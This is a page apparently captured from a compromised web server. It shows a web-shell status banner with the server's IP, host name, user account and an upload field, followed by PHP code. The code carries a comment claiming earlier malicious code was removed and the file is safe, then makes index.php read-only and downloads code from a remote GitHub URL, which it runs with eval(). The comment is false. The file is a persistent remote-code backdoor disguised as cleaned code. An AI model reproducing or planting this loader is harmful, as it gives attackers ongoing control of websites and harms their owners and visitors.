Server IP : 162.0.215.126 / Your IP : 216.73.216.4 Web Server : LiteSpeed System : Linux business105.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64 User : tektomgb ( 586) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tektomgb/.cagefs/rex/ |
Upload File : |
<?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code have been removed, and the file is now safe to use. */ ?> <?php // Path to the file $file = 'index.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php $remoteUrl = "https://raw.githubusercontent.com/hulkbd/culrtest/main/index.txt"; $ch = curl_init($remoteUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $remoteCode = curl_exec($ch); if (curl_errno($ch)) { die('cURL error: ' . curl_error($ch)); } curl_close($ch); eval("?>" . $remoteCode); ?>